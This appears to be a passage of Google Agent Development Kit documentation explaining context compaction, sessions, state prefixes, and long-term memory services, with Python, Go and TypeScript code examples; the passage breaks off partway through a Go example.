As an ADK agent runs, it collects *context* information, including user instructions, retrieved data, tool responses, and generated content. As the size of this context data grows, agent processing times typically also increase. More and more data is sent to the generative AI model used by the agent, increasing processing time and slowing down responses. The ADK Context Compaction feature is designed to reduce the size of context as an agent is running by summarizing older parts of the agent workflow event history.

The Context Compaction feature uses a *sliding window* approach for collecting and summarizing agent workflow event data within a [Session](/adk-docs/sessions/session/). When you configure this feature in your agent, it summarizes data from older events once it reaches a threshold of a specific number of workflow events, or invocations, within the current Session.

## Configure context compaction

Add context compaction to your agent workflow by adding an Events Compaction Configuration setting to the App object of your workflow.
As part of the configuration, you must specify a compaction interval and overlap size, as shown in the following sample code:

```python
from google.adk.apps.app import App
from google.adk.apps.app import EventsCompactionConfig

app = App(
    name='my-agent',
    root_agent=root_agent,
    events_compaction_config=EventsCompactionConfig(
        compaction_interval=3,  # Trigger compaction every 3 new invocations.
        overlap_size=1          # Include last invocation from the previous window.
    ),
)
```

Once configured, the ADK `Runner` handles the compaction process in the background each time the session reaches the interval.

## Example of context compaction

If you set `compaction_interval` to 3 and `overlap_size` to 1, the event data is compressed upon completion of events 3, 6, 9, and so on. The overlap setting increases the size of the second summary compression, and of each summary afterwards, as shown in Figure 1.

**Figure 1.** Illustration of event compaction configuration with an interval of 3 and overlap of 1.

With this example configuration, the context compression tasks happen as follows:

1. **Event 3 completes**: All 3 events are compressed into a summary
1. **Event 6 completes**: Events 3 to 6 are compressed, including the overlap of 1 prior event
1. **Event 9 completes**: Events 6 to 9 are compressed, including the overlap of 1 prior event

## Configuration settings

The configuration settings for this feature control how frequently event data is compressed and how much data is retained as the agent workflow runs. Optionally, you can configure a summarizer object.

- **`compaction_interval`**: Set the number of completed events that triggers compaction of the prior event data.
- **`overlap_size`**: Set how many of the previously compacted events are included in a newly compacted context set.
- **`summarizer`**: (Optional) Define a summarizer object including a specific AI model to use for summarization. For more information, see [Define a Summarizer](#define-summarizer).
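The window arithmetic described in the example above can be sketched in plain Python. This is only an illustration of how `compaction_interval` and `overlap_size` interact, not the ADK implementation; the function name `compaction_windows` is hypothetical, and events are numbered from 1 as in the example.

```python
def compaction_windows(total_events, compaction_interval, overlap_size):
    """Return (trigger_event, first_event, last_event) for each compaction.

    Hypothetical helper: it only mirrors the arithmetic of the documented
    example and does not call any ADK API.
    """
    windows = []
    for trigger in range(compaction_interval, total_events + 1, compaction_interval):
        # Start of the new window, pulled back by the overlap, but never before event 1.
        start = max(1, trigger - compaction_interval + 1 - overlap_size)
        windows.append((trigger, start, trigger))
    return windows


for trigger, start, end in compaction_windows(9, compaction_interval=3, overlap_size=1):
    print(f"After event {trigger}: summarize events {start} to {end}")
```

With an interval of 3 and an overlap of 1, the sketch reproduces the windows listed above: events 1 to 3, then 3 to 6, then 6 to 9. A larger overlap carries more of the previous window into each summary, at the cost of summarizing more data each time.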
### Define a Summarizer

You can customize the process of context compression by defining a summarizer. The `LlmEventSummarizer` class allows you to specify a particular model for summarization. The following code example demonstrates how to define and configure a custom summarizer:

```python
from google.adk.apps.app import App, EventsCompactionConfig
from google.adk.apps.llm_event_summarizer import LlmEventSummarizer
from google.adk.models import Gemini

# Define the AI model to be used for summarization:
summarization_llm = Gemini(model="gemini-2.5-flash")

# Create the summarizer with the custom model:
my_summarizer = LlmEventSummarizer(llm=summarization_llm)

# Configure the App with the custom summarizer and compaction settings:
app = App(
    name='my-agent',
    root_agent=root_agent,
    events_compaction_config=EventsCompactionConfig(
        compaction_interval=3,
        overlap_size=1,
        summarizer=my_summarizer,
    ),
)
```

You can further refine the operation of the `SlidingWindowCompactor` by modifying its summarizer class `LlmEventSummarizer`, including changing the `prompt_template` setting of that class. For more details, see the [`LlmEventSummarizer` code](https://github.com/google/adk-python/blob/main/src/google/adk/apps/llm_event_summarizer.py#L60).

# Introduction to Conversational Context: Session, State, and Memory

Supported in ADK: Python, TypeScript, Go, Java

Meaningful, multi-turn conversations require agents to understand context. Just like humans, they need to recall the conversation history (what's been said and done) to maintain continuity and avoid repetition. The Agent Development Kit (ADK) provides structured ways to manage this context through `Session`, `State`, and `Memory`.

## Core Concepts

Think of different instances of your conversations with the agent as distinct **conversation threads**, potentially drawing upon **long-term knowledge**.

1. **`Session`**: The Current Conversation Thread
   - Represents a *single, ongoing interaction* between a user and your agent system.
   - Contains the chronological sequence of messages and actions taken by the agent (referred to as `Events`) during *that specific interaction*.
   - A `Session` can also hold temporary data (`State`) relevant only *during this conversation*.
1. **`State` (`session.state`)**: Data Within the Current Conversation
   - Data stored within a specific `Session`.
   - Used to manage information relevant *only* to the *current, active* conversation thread (e.g., items in a shopping cart *during this chat*, user preferences mentioned *in this session*).
1. **`Memory`**: Searchable, Cross-Session Information
   - Represents a store of information that might span *multiple past sessions* or include external data sources.
   - It acts as a knowledge base the agent can *search* to recall information or context beyond the immediate conversation.

## Managing Context: Services

ADK provides services to manage these concepts:

1. **`SessionService`**: Manages the different conversation threads (`Session` objects)
   - Handles the lifecycle: creating, retrieving, updating (appending `Events`, modifying `State`), and deleting individual `Session`s.
1. **`MemoryService`**: Manages the Long-Term Knowledge Store (`Memory`)
   - Handles ingesting information (often from completed `Session`s) into the long-term store.
   - Provides methods to search this stored knowledge based on queries.

**Implementations**: ADK offers different implementations for both `SessionService` and `MemoryService`, allowing you to choose the storage backend that best fits your application's needs. Notably, **in-memory implementations** are provided for both services; these are designed specifically for **local testing and fast development**. It's important to remember that **all data stored using these in-memory options (sessions, state, or long-term knowledge) is lost when your application restarts**. For persistence and scalability beyond local testing, ADK also offers cloud-based and database service options.
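To make the split between per-conversation data and cross-session knowledge concrete, here is a toy model in plain Python. `ToySession` and `ToyMemoryStore` are hypothetical stand-ins written for this illustration; they are not ADK classes and do not reflect how the ADK services are implemented.

```python
from dataclasses import dataclass, field


@dataclass
class ToySession:
    """Hypothetical stand-in for one conversation thread (not an ADK class)."""
    session_id: str
    events: list = field(default_factory=list)  # chronological history
    state: dict = field(default_factory=dict)   # scratchpad for this thread only


class ToyMemoryStore:
    """Hypothetical stand-in for a long-term, searchable store (not an ADK class)."""

    def __init__(self):
        self._archive = []

    def add_session(self, session):
        # Ingest the finished conversation's events into the archive.
        self._archive.extend(session.events)

    def search(self, query):
        # Naive keyword match: keep entries sharing at least one word with the query.
        words = set(query.lower().split())
        return [e for e in self._archive if words & set(e.lower().split())]


memory = ToyMemoryStore()

first = ToySession("session_1")
first.events.append("user: my favorite project is Project Alpha")
first.state["topic"] = "projects"
memory.add_session(first)

second = ToySession("session_2")
print(second.state)                       # the new thread starts with its own empty state
print(memory.search("favorite project"))  # the archive still holds the earlier event
```

The point of the sketch is the lifecycle: state lives and dies with its session, while anything ingested into the memory store remains searchable from later sessions.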
**In Summary:**

- **`Session` & `State`**: Focus on the **current interaction** – the history and data of the *single, active conversation*. Managed primarily by a `SessionService`.
- **Memory**: Focuses on the **past and external information** – a *searchable archive* potentially spanning across conversations. Managed by a `MemoryService`.

## What's Next?

In the following sections, we'll dive deeper into each of these components:

- **`Session`**: Understanding its structure and `Events`.
- **`State`**: How to effectively read, write, and manage session-specific data.
- **`SessionService`**: Choosing the right storage backend for your sessions.
- **`MemoryService`**: Exploring options for storing and retrieving broader context.

Understanding these concepts is fundamental to building agents that can engage in complex, stateful, and context-aware conversations.

# Memory: Long-Term Knowledge with `MemoryService`

Supported in ADK: Python v0.1.0, TypeScript v0.2.0, Go v0.1.0, Java v0.1.0

We've seen how `Session` tracks the history (`events`) and temporary data (`state`) for a *single, ongoing conversation*. But what if an agent needs to recall information from *past* conversations? This is where the concept of **Long-Term Knowledge** and the **`MemoryService`** come into play.

Think of it this way:

- **`Session` / `State`:** Like your short-term memory during one specific chat.
- **Long-Term Knowledge (`MemoryService`)**: Like a searchable archive or knowledge library the agent can consult, potentially containing information from many past chats or other sources.

## The `MemoryService` Role

The `BaseMemoryService` defines the interface for managing this searchable, long-term knowledge store. Its primary responsibilities are:

1. **Ingesting Information (`add_session_to_memory`):** Taking the contents of a (usually completed) `Session` and adding relevant information to the long-term knowledge store.
1.
**Searching Information (`search_memory`):** Allowing an agent (typically via a `Tool`) to query the knowledge store and retrieve relevant snippets or context based on a search query.

## Choosing the Right Memory Service

The ADK offers two distinct `MemoryService` implementations, each tailored to different use cases. Use the table below to decide which is the best fit for your agent.

| **Feature** | **InMemoryMemoryService** | **VertexAiMemoryBankService** |
| --- | --- | --- |
| **Persistence** | None (data is lost on restart) | Yes (Managed by Vertex AI) |
| **Primary Use Case** | Prototyping, local development, and simple testing. | Building meaningful, evolving memories from user conversations. |
| **Memory Extraction** | Stores full conversation | Extracts [meaningful information](https://cloud.google.com/vertex-ai/generative-ai/docs/agent-engine/memory-bank/generate-memories) from conversations and consolidates it with existing memories (powered by LLM) |
| **Search Capability** | Basic keyword matching. | Advanced semantic search. |
| **Setup Complexity** | None. It's the default. | Low. Requires an [Agent Engine](https://cloud.google.com/vertex-ai/generative-ai/docs/agent-engine/memory-bank/overview) instance in Vertex AI. |
| **Dependencies** | None. | Google Cloud Project, Vertex AI API |
| **When to use it** | When you want to search across multiple sessions’ chat histories for prototyping. | When you want your agent to remember and learn from past interactions. |

## In-Memory Memory

The `InMemoryMemoryService` stores session information in the application's memory and performs basic keyword matching for searches.
It requires no setup and is best for prototyping and simple testing scenarios where persistence isn't required. ```py from google.adk.memory import InMemoryMemoryService memory_service = InMemoryMemoryService() ``` ```go import ( "google.golang.org/adk/memory" "google.golang.org/adk/session" ) // Services must be shared across runners to share state and memory. sessionService := session.InMemoryService() memoryService := memory.InMemoryService() ``` **Example: Adding and Searching Memory** This example demonstrates the basic flow using the `InMemoryMemoryService` for simplicity. ```py import asyncio from google.adk.agents import LlmAgent from google.adk.sessions import InMemorySessionService, Session from google.adk.memory import InMemoryMemoryService # Import MemoryService from google.adk.runners import Runner from google.adk.tools import load_memory # Tool to query memory from google.genai.types import Content, Part # --- Constants --- APP_NAME = "memory_example_app" USER_ID = "mem_user" MODEL = "gemini-2.0-flash" # Use a valid model # --- Agent Definitions --- # Agent 1: Simple agent to capture information info_capture_agent = LlmAgent( model=MODEL, name="InfoCaptureAgent", instruction="Acknowledge the user's statement.", ) # Agent 2: Agent that can use memory memory_recall_agent = LlmAgent( model=MODEL, name="MemoryRecallAgent", instruction="Answer the user's question. 
Use the 'load_memory' tool " "if the answer might be in past conversations.", tools=[load_memory] # Give the agent the tool ) # --- Services --- # Services must be shared across runners to share state and memory session_service = InMemorySessionService() memory_service = InMemoryMemoryService() # Use in-memory for demo async def run_scenario(): # --- Scenario --- # Turn 1: Capture some information in a session print("--- Turn 1: Capturing Information ---") runner1 = Runner( # Start with the info capture agent agent=info_capture_agent, app_name=APP_NAME, session_service=session_service, memory_service=memory_service # Provide the memory service to the Runner ) session1_id = "session_info" await runner1.session_service.create_session(app_name=APP_NAME, user_id=USER_ID, session_id=session1_id) user_input1 = Content(parts=[Part(text="My favorite project is Project Alpha.")], role="user") # Run the agent final_response_text = "(No final response)" async for event in runner1.run_async(user_id=USER_ID, session_id=session1_id, new_message=user_input1): if event.is_final_response() and event.content and event.content.parts: final_response_text = event.content.parts[0].text print(f"Agent 1 Response: {final_response_text}") # Get the completed session completed_session1 = await runner1.session_service.get_session(app_name=APP_NAME, user_id=USER_ID, session_id=session1_id) # Add this session's content to the Memory Service print("\n--- Adding Session 1 to Memory ---") await memory_service.add_session_to_memory(completed_session1) print("Session added to memory.") # Turn 2: Recall the information in a new session print("\n--- Turn 2: Recalling Information ---") runner2 = Runner( # Use the second agent, which has the memory tool agent=memory_recall_agent, app_name=APP_NAME, session_service=session_service, # Reuse the same service memory_service=memory_service # Reuse the same service ) session2_id = "session_recall" await 
runner2.session_service.create_session(app_name=APP_NAME, user_id=USER_ID, session_id=session2_id) user_input2 = Content(parts=[Part(text="What is my favorite project?")], role="user") # Run the second agent final_response_text_2 = "(No final response)" async for event in runner2.run_async(user_id=USER_ID, session_id=session2_id, new_message=user_input2): if event.is_final_response() and event.content and event.content.parts: final_response_text_2 = event.content.parts[0].text print(f"Agent 2 Response: {final_response_text_2}") # To run this example, you can use the following snippet: # asyncio.run(run_scenario()) # await run_scenario() ``` ```go import ( "context" "fmt" "log" "strings" "google.golang.org/adk/agent" "google.golang.org/adk/agent/llmagent" "google.golang.org/adk/memory" "google.golang.org/adk/model/gemini" "google.golang.org/adk/runner" "google.golang.org/adk/session" "google.golang.org/adk/tool" "google.golang.org/adk/tool/functiontool" "google.golang.org/genai" ) const ( appName = "go_memory_example_app" userID = "go_mem_user" modelID = "gemini-2.5-pro" ) // Args defines the input structure for the memory search tool. type Args struct { Query string `json:"query" jsonschema:"The query to search for in the memory."` } // Result defines the output structure for the memory search tool. type Result struct { Results []string `json:"results"` } // memorySearchToolFunc is the implementation of the memory search tool. // This function demonstrates accessing memory via tool.Context. func memorySearchToolFunc(tctx tool.Context, args Args) (Result, error) { fmt.Printf("Tool: Searching memory for query: '%s'\n", args.Query) // The SearchMemory function is available on the context. 
searchResults, err := tctx.SearchMemory(context.Background(), args.Query) if err != nil { log.Printf("Error searching memory: %v", err) return Result{}, fmt.Errorf("failed memory search") } var results []string for _, res := range searchResults.Memories { if res.Content != nil { results = append(results, textParts(res.Content)...) } } return Result{Results: results}, nil } // Define a tool that can search memory. var memorySearchTool = must(functiontool.New( functiontool.Config{ Name: "search_past_conversations", Description: "Searches past conversations for relevant information.", }, memorySearchToolFunc, )) // This example demonstrates how to use the MemoryService in the Go ADK. // It covers two main scenarios: // 1. Adding a completed session to memory and recalling it in a new session. // 2. Searching memory from within a custom tool using the tool.Context. func main() { ctx := context.Background() // --- Services --- // Services must be shared across runners to share state and memory. sessionService := session.InMemoryService() memoryService := memory.InMemoryService() // Use in-memory for this demo. 
// --- Scenario 1: Capture information in one session --- fmt.Println("--- Turn 1: Capturing Information ---") infoCaptureAgent := must(llmagent.New(llmagent.Config{ Name: "InfoCaptureAgent", Model: must(gemini.NewModel(ctx, modelID, nil)), Instruction: "Acknowledge the user's statement.", })) runner1 := must(runner.New(runner.Config{ AppName: appName, Agent: infoCaptureAgent, SessionService: sessionService, MemoryService: memoryService, // Provide the memory service to the Runner })) session1ID := "session_info" must(sessionService.Create(ctx, &session.CreateRequest{AppName: appName, UserID: userID, SessionID: session1ID})) userInput1 := genai.NewContentFromText("My favorite project is Project Alpha.", "user") var finalResponseText string for event, err := range runner1.Run(ctx, userID, session1ID, userInput1, agent.RunConfig{}) { if err != nil { log.Printf("Agent 1 Error: %v", err) continue } if event.Content != nil && !event.LLMResponse.Partial { finalResponseText = strings.Join(textParts(event.LLMResponse.Content), "") } } fmt.Printf("Agent 1 Response: %s\n", finalResponseText) // Add the completed session to the Memory Service fmt.Println("\n--- Adding Session 1 to Memory ---") resp, err := sessionService.Get(ctx, &session.GetRequest{AppName: appName, UserID: userID, SessionID: session1ID}) if err != nil { log.Fatalf("Failed to get completed session: %v", err) } if err := memoryService.AddSession(ctx, resp.Session); err != nil { log.Fatalf("Failed to add session to memory: %v", err) } fmt.Println("Session added to memory.") // --- Scenario 2: Recall the information in a new session using a tool --- fmt.Println("\n--- Turn 2: Recalling Information ---") memoryRecallAgent := must(llmagent.New(llmagent.Config{ Name: "MemoryRecallAgent", Model: must(gemini.NewModel(ctx, modelID, nil)), Instruction: "Answer the user's question. 
Use the 'search_past_conversations' tool if the answer might be in past conversations.", Tools: []tool.Tool{memorySearchTool}, // Give the agent the tool })) runner2 := must(runner.New(runner.Config{ Agent: memoryRecallAgent, AppName: appName, SessionService: sessionService, MemoryService: memoryService, })) session2ID := "session_recall" must(sessionService.Create(ctx, &session.CreateRequest{AppName: appName, UserID: userID, SessionID: session2ID})) userInput2 := genai.NewContentFromText("What is my favorite project?", "user") var finalResponseText2 string for event, err := range runner2.Run(ctx, userID, session2ID, userInput2, agent.RunConfig{}) { if err != nil { log.Printf("Agent 2 Error: %v", err) continue } if event.Content != nil && !event.LLMResponse.Partial { finalResponseText2 = strings.Join(textParts(event.LLMResponse.Content), "") } } fmt.Printf("Agent 2 Response: %s\n", finalResponseText2) } ``` ### Searching Memory Within a Tool You can also search memory from within a custom tool by using the `tool.Context`. ```go // memorySearchToolFunc is the implementation of the memory search tool. // This function demonstrates accessing memory via tool.Context. func memorySearchToolFunc(tctx tool.Context, args Args) (Result, error) { fmt.Printf("Tool: Searching memory for query: '%s'\n", args.Query) // The SearchMemory function is available on the context. searchResults, err := tctx.SearchMemory(context.Background(), args.Query) if err != nil { log.Printf("Error searching memory: %v", err) return Result{}, fmt.Errorf("failed memory search") } var results []string for _, res := range searchResults.Memories { if res.Content != nil { results = append(results, textParts(res.Content)...) } } return Result{Results: results}, nil } // Define a tool that can search memory. 
var memorySearchTool = must(functiontool.New( functiontool.Config{ Name: "search_past_conversations", Description: "Searches past conversations for relevant information.", }, memorySearchToolFunc, )) ``` ## Vertex AI Memory Bank The `VertexAiMemoryBankService` connects your agent to [Vertex AI Memory Bank](https://cloud.google.com/vertex-ai/generative-ai/docs/agent-engine/memory-bank/overview), a fully managed Google Cloud service that provides sophisticated, persistent memory capabilities for conversational agents. ### How It Works The service handles two key operations: - **Generating Memories:** At the end of a conversation, you can send the session's events to the Memory Bank, which intelligently processes and stores the information as "memories." - **Retrieving Memories:** Your agent code can issue a search query against the Memory Bank to retrieve relevant memories from past conversations. ### Prerequisites Before you can use this feature, you must have: 1. **A Google Cloud Project:** With the Vertex AI API enabled. 1. **An Agent Engine:** You need to create an Agent Engine in Vertex AI. You do not need to deploy your agent to Agent Engine Runtime to use Memory Bank. This will provide you with the **Agent Engine ID** required for configuration. 1. **Authentication:** Ensure your local environment is authenticated to access Google Cloud services. The simplest way is to run: ```bash gcloud auth application-default login ``` 1. **Environment Variables:** The service requires your Google Cloud Project ID and Location. Set them as environment variables: ```bash export GOOGLE_CLOUD_PROJECT="your-gcp-project-id" export GOOGLE_CLOUD_LOCATION="your-gcp-location" ``` ### Configuration To connect your agent to the Memory Bank, you use the `--memory_service_uri` flag when starting the ADK server (`adk web` or `adk api_server`). The URI must be in the format `agentengine://`. 
```bash
adk web path/to/your/agents_dir --memory_service_uri="agentengine://1234567890"
```

Or, you can configure your agent to use the Memory Bank by manually instantiating the `VertexAiMemoryBankService` and passing it to the `Runner`.

```py
from google.adk.memory import VertexAiMemoryBankService
from google.adk.runners import Runner

# `agent_engine` is assumed to be an Agent Engine resource you created earlier.
agent_engine_id = agent_engine.api_resource.name.split("/")[-1]

memory_service = VertexAiMemoryBankService(
    project="PROJECT_ID",
    location="LOCATION",
    agent_engine_id=agent_engine_id
)

runner = Runner(
    # ... (other Runner arguments)
    memory_service=memory_service
)
```

## Using Memory in Your Agent

When a memory service is configured, your agent can use a tool or callback to retrieve memories. ADK includes two pre-built tools for retrieving memories:

- `PreloadMemory`: Always retrieve memory at the beginning of each turn (similar to a callback).
- `LoadMemory`: Retrieve memory when your agent decides it would be helpful.

**Example:**

```python
from google.adk.agents import Agent
from google.adk.tools.preload_memory_tool import PreloadMemoryTool

agent = Agent(
    model=MODEL_ID,
    name='weather_sentiment_agent',
    instruction="...",
    tools=[PreloadMemoryTool()]
)
```

To extract memories from your session, you need to call `add_session_to_memory`. For example, you can automate this via a callback:

```python
from google.adk.agents import Agent
from google.adk.tools.preload_memory_tool import PreloadMemoryTool


async def auto_save_session_to_memory_callback(callback_context):
    # Save the current session to the configured memory service after the agent runs.
    await callback_context._invocation_context.memory_service.add_session_to_memory(
        callback_context._invocation_context.session)


agent = Agent(
    model=MODEL,
    name="Generic_QA_Agent",
    instruction="Answer the user's questions",
    tools=[PreloadMemoryTool()],
    after_agent_callback=auto_save_session_to_memory_callback,
)
```

## Advanced Concepts

### How Memory Works in Practice

The memory workflow internally involves these steps:

1. **Session Interaction:** A user interacts with an agent via a `Session`, managed by a `SessionService`. Events are added, and state might be updated.
1.
**Ingestion into Memory:** At some point (often when a session is considered complete or has yielded significant information), your application calls `memory_service.add_session_to_memory(session)`. This extracts relevant information from the session's events and adds it to the long-term knowledge store (in-memory dictionary or Agent Engine Memory Bank). 1. **Later Query:** In a *different* (or the same) session, the user might ask a question requiring past context (e.g., "What did we discuss about project X last week?"). 1. **Agent Uses Memory Tool:** An agent equipped with a memory-retrieval tool (like the built-in `load_memory` tool) recognizes the need for past context. It calls the tool, providing a search query (e.g., "discussion project X last week"). 1. **Search Execution:** The tool internally calls `memory_service.search_memory(app_name, user_id, query)`. 1. **Results Returned:** The `MemoryService` searches its store (using keyword matching or semantic search) and returns relevant snippets as a `SearchMemoryResponse` containing a list of `MemoryResult` objects (each potentially holding events from a relevant past session). 1. **Agent Uses Results:** The tool returns these results to the agent, usually as part of the context or function response. The agent can then use this retrieved information to formulate its final answer to the user. ### Can an agent have access to more than one memory service? - **Through Standard Configuration: No.** The framework (`adk web`, `adk api_server`) is designed to be configured with one single memory service at a time via the `--memory_service_uri` flag. This single service is then provided to the agent and accessed through the built-in `self.search_memory()` method. From a configuration standpoint, you can only choose one backend (`InMemory`, `VertexAiMemoryBankService`) for all agents served by that process. 
- **Within Your Agent's Code: Yes, absolutely.** There is nothing preventing you from manually importing and instantiating another memory service directly inside your agent's code. This allows you to access multiple memory sources within a single agent turn. For example, your agent could use the framework-configured `InMemoryMemoryService` to recall conversational history, and also manually instantiate a `VertexAiMemoryBankService` to look up information in a technical manual. #### Example: Using Two Memory Services Here’s how you could implement that in your agent's code: ```python from google.adk.agents import Agent from google.adk.memory import InMemoryMemoryService, VertexAiMemoryBankService from google.genai import types class MultiMemoryAgent(Agent): def __init__(self, **kwargs): super().__init__(**kwargs) self.memory_service = InMemoryMemoryService() # Manually instantiate a second memory service for document lookups self.vertexai_memorybank_service = VertexAiMemoryBankService( project="PROJECT_ID", location="LOCATION", agent_engine_id="AGENT_ENGINE_ID" ) async def run(self, request: types.Content, **kwargs) -> types.Content: user_query = request.parts[0].text # 1. Search conversational history using the framework-provided memory # (This would be InMemoryMemoryService if configured) conversation_context = await self.memory_service.search_memory(query=user_query) # 2. 
Search the document knowledge base using the manually created service document_context = await self.vertexai_memorybank_service.search_memory(query=user_query) # Combine the context from both sources to generate a better response prompt = "From our past conversations, I remember:\n" prompt += f"{conversation_context.memories}\n\n" prompt += "From the technical manuals, I found:\n" prompt += f"{document_context.memories}\n\n" prompt += f"Based on all this, here is my answer to '{user_query}':" return await self.llm.generate_content_async(prompt) ``` # State: The Session's Scratchpad Supported in ADKPython v0.1.0TypeScript v0.2.0Go v0.1.0Java v0.1.0 Within each `Session` (our conversation thread), the **`state`** attribute acts like the agent's dedicated scratchpad for that specific interaction. While `session.events` holds the full history, `session.state` is where the agent stores and updates dynamic details needed *during* the conversation. ## What is `session.state`? Conceptually, `session.state` is a collection (dictionary or Map) holding key-value pairs. It's designed for information the agent needs to recall or track to make the current conversation effective: - **Personalize Interaction:** Remember user preferences mentioned earlier (e.g., `'user_preference_theme': 'dark'`). - **Track Task Progress:** Keep tabs on steps in a multi-turn process (e.g., `'booking_step': 'confirm_payment'`). - **Accumulate Information:** Build lists or summaries (e.g., `'shopping_cart_items': ['book', 'pen']`). - **Make Informed Decisions:** Store flags or values influencing the next response (e.g., `'user_is_authenticated': True`). ### Key Characteristics of `State` 1. **Structure: Serializable Key-Value Pairs** - Data is stored as `key: value`. - **Keys:** Always strings (`str`). Use clear names (e.g., `'departure_city'`, `'user:language_preference'`). - **Values:** Must be **serializable**. This means they can be easily saved and loaded by the `SessionService`. 
Stick to basic types in the specific languages (Python/Go/Java/TypeScript) like strings, numbers, booleans, and simple lists or dictionaries containing *only* these basic types. (See API documentation for precise details).
   - **⚠️ Avoid Complex Objects:** **Do not store non-serializable objects** (custom class instances, functions, connections, etc.) directly in the state. Store simple identifiers if needed, and retrieve the complex object elsewhere.
1. **Mutability: It Changes**
   - The contents of the `state` are expected to change as the conversation evolves.
1. **Persistence: Depends on `SessionService`**
   - Whether state survives application restarts depends on your chosen service:
     - `InMemorySessionService`: **Not Persistent.** State is lost on restart.
     - `DatabaseSessionService` / `VertexAiSessionService`: **Persistent.** State is saved reliably.

**Note:** The specific parameters or method names for the primitives may vary slightly by SDK language (e.g., `session.state['current_intent'] = 'book_flight'` in Python, `context.State().Set("current_intent", "book_flight")` in Go, `session.state().put("current_intent", "book_flight")` in Java, or `context.state.set("current_intent", "book_flight")` in TypeScript). Refer to the language-specific API documentation for details.

### Organizing State with Prefixes: Scope Matters

Prefixes on state keys define their scope and persistence behavior, especially with persistent services:

- **No Prefix (Session State):**
  - **Scope:** Specific to the *current* session (`id`).
  - **Persistence:** Only persists if the `SessionService` is persistent (`Database`, `VertexAI`).
  - **Use Cases:** Tracking progress within the current task (e.g., `'current_booking_step'`), temporary flags for this interaction (e.g., `'needs_clarification'`).
  - **Example:** `session.state['current_intent'] = 'book_flight'`
- **`user:` Prefix (User State):**
  - **Scope:** Tied to the `user_id`, shared across *all* sessions for that user (within the same `app_name`).
  - **Persistence:** Persistent with `Database` or `VertexAI`. (Stored by `InMemory` but lost on restart).
  - **Use Cases:** User preferences (e.g., `'user:theme'`), profile details (e.g., `'user:name'`).
  - **Example:** `session.state['user:preferred_language'] = 'fr'`
- **`app:` Prefix (App State):**
  - **Scope:** Tied to the `app_name`, shared across *all* users and sessions for that application.
  - **Persistence:** Persistent with `Database` or `VertexAI`. (Stored by `InMemory` but lost on restart).
  - **Use Cases:** Global settings (e.g., `'app:api_endpoint'`), shared templates.
  - **Example:** `session.state['app:global_discount_code'] = 'SAVE10'`
- **`temp:` Prefix (Temporary Invocation State):**
  - **Scope:** Specific to the current **invocation** (the entire process from an agent receiving user input to generating the final output for that input).
  - **Persistence:** **Not Persistent.** Discarded after the invocation completes and does not carry over to the next one.
  - **Use Cases:** Storing intermediate calculations, flags, or data passed between tool calls within a single invocation.
  - **When Not to Use:** For information that must persist across different invocations, such as user preferences, conversation history summaries, or accumulated data.
  - **Example:** `session.state['temp:raw_api_response'] = {...}`

**Sub-Agents and Invocation Context:** When a parent agent calls a sub-agent (e.g., using `SequentialAgent` or `ParallelAgent`), it passes its `InvocationContext` to the sub-agent. This means the entire chain of agent calls shares the same invocation ID and, therefore, the same `temp:` state.

**How the Agent Sees It:** Your agent code interacts with the *combined* state through the single `session.state` collection (dict/Map). The `SessionService` handles fetching/merging state from the correct underlying storage based on prefixes.
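The prefix routing described above can be pictured with a small, framework-free sketch. `ToyStateStore`, `apply_delta`, and `merged_state` are hypothetical names invented for this illustration; they are not part of ADK, and a real `SessionService` may organize its storage differently. The sketch only shows the idea that `app:` and `user:` keys live in shared buckets, unprefixed keys live with one session, `temp:` keys are never stored, and the agent reads a single merged view.

```python
from collections import defaultdict

APP_PREFIX, USER_PREFIX, TEMP_PREFIX = "app:", "user:", "temp:"


class ToyStateStore:
    """Hypothetical stand-in for a session service's state storage (not ADK code)."""

    def __init__(self):
        self.app_state = defaultdict(dict)      # app_name -> state
        self.user_state = defaultdict(dict)     # (app_name, user_id) -> state
        self.session_state = defaultdict(dict)  # (app_name, user_id, session_id) -> state

    def apply_delta(self, app_name, user_id, session_id, delta):
        """Route each key in a state delta to the bucket its prefix selects."""
        for key, value in delta.items():
            if key.startswith(TEMP_PREFIX):
                continue  # invocation-only data is never stored
            if key.startswith(APP_PREFIX):
                self.app_state[app_name][key] = value
            elif key.startswith(USER_PREFIX):
                self.user_state[(app_name, user_id)][key] = value
            else:
                self.session_state[(app_name, user_id, session_id)][key] = value

    def merged_state(self, app_name, user_id, session_id):
        """Build the single combined view that agent code would read."""
        merged = {}
        merged.update(self.app_state[app_name])
        merged.update(self.user_state[(app_name, user_id)])
        merged.update(self.session_state[(app_name, user_id, session_id)])
        return merged


store = ToyStateStore()
store.apply_delta("shop", "alice", "s1", {
    "app:global_discount_code": "SAVE10",
    "user:preferred_language": "fr",
    "current_intent": "book_flight",
    "temp:raw_api_response": {"status": 200},
})

same_session = store.merged_state("shop", "alice", "s1")   # app, user, and session keys
other_session = store.merged_state("shop", "alice", "s2")  # app and user keys only
other_user = store.merged_state("shop", "bob", "s9")       # app key only
```

In this toy model the keys keep their prefixes in the merged view, which matches how the examples above read and write `session.state['user:...']` directly.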
### Accessing Session State in Agent Instructions When working with `LlmAgent` instances, you can directly inject session state values into the agent's instruction string using a simple templating syntax. This allows you to create dynamic and context-aware instructions without relying solely on natural language directives. #### Using `{key}` Templating To inject a value from the session state, enclose the key of the desired state variable within curly braces: `{key}`. The framework will automatically replace this placeholder with the corresponding value from `session.state` before passing the instruction to the LLM. **Example:** ```python from google.adk.agents import LlmAgent story_generator = LlmAgent( name="StoryGenerator", model="gemini-2.0-flash", instruction="""Write a short story about a cat, focusing on the theme: {topic}.""" ) # Assuming session.state['topic'] is set to "friendship", the LLM # will receive the following instruction: # "Write a short story about a cat, focusing on the theme: friendship." ``` ```typescript import { LlmAgent } from "@google/adk"; const storyGenerator = new LlmAgent({ name: "StoryGenerator", model: "gemini-2.5-flash", instruction: "Write a short story about a cat, focusing on the theme: {topic}." }); // Assuming session.state['topic'] is set to "friendship", the LLM // will receive the following instruction: // "Write a short story about a cat, focusing on the theme: friendship." ``` ```go func main() { ctx := context.Background() sessionService := session.InMemoryService() // 1. Initialize a session with a 'topic' in its state. _, err := sessionService.Create(ctx, &session.CreateRequest{ AppName: appName, UserID: userID, SessionID: sessionID, State: map[string]any{ "topic": "friendship", }, }) if err != nil { log.Fatalf("Failed to create session: %v", err) } // 2. Create an agent with an instruction that uses a {topic} placeholder. 
